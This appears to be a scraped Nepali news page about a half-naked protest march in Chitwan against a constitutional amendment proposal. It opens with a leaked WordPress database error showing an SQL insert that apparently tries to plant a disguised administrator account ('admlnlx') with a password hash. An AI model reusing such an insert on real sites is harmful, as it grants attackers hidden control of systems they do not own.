WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOeCt5GOmAzR/k85zDOErfM4MaNg/a0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 19:57:16', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर २२–
सरकारले ल्याएको संविधान संशोधन प्रस्तावको बिरोध गर्दै चितवनमा अर्धनग्न जुलुस निश्किएको छ ।
नेकपा एमालेको भातृ संगठन युवा संघ नेपाल चितवन र अनेरास्ववियु चितवनले संयुक्त रुपमा आज विहान चितवनमा अर्धनग्न जुलुस निकालेका हुन् । भरतपुरको चौविसकोठीबाट निश्किएको जुलुस नारायणगढको पुलचोकमा पुगी समापन भएको थियो । उनीहरुले सरकारविरुद्ध चर्को नाराबाजी समेत गरेका थिए ।